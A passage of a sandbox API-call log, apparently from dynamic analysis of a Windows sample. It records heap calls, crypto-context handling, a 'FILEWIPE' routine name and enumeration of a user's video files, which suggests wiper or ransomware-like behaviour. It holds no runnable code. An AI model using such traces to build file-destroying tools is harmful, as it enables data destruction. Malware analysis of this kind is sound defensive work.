dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0194.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.579] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0194.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.579] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0194.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0194.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0194.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0194.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0194.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0194.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0194.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0194.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0194.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0194.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0194.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0194.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0194.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0194.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0194.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0194.581] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0194.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0194.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0194.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba228 [0194.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0194.582] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0194.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0194.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0194.582] FreeLibrary (hLibModule=0x74f20000) returned 1 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0194.582] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0194.582] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.582] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0194.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0194.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0194.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba228 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0194.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0194.583] CloseHandle (hObject=0x160) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0194.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0194.584] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0194.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba228 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0194.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0194.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0194.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0194.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.586] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0194.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0194.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.587] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0194.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0194.587] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0194.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0194.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0194.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0194.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0194.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0194.588] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0194.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d91460, ftCreationTime.dwHighDateTime=0x1d5e6a1, ftLastAccessTime.dwLowDateTime=0x45eed560, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x45eed560, ftLastWriteTime.dwHighDateTime=0x1d5e2d1, nFileSizeHigh=0x0, nFileSizeLow=0x1418f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-4jYTdy7DTgQ 7n_RHA.swf", cAlternateFileName="-4JYTD~1.SWF")) returned 0x90af58 [0194.588] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0194.588] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0194.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0194.589] CharLowerBuffW (in: lpsz="byte[82319]", cchLength=0xb | out: lpsz="byte[82319]") returned 0xb [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0194.589] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0194.590] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0194.590] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0194.590] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.590] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0194.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0194.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1890 [0194.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1890, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0194.591] FreeLibrary (hLibModule=0x75c90000) returned 1 [0194.591] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0194.591] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0194.591] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0194.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0194.591] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0194.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0194.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 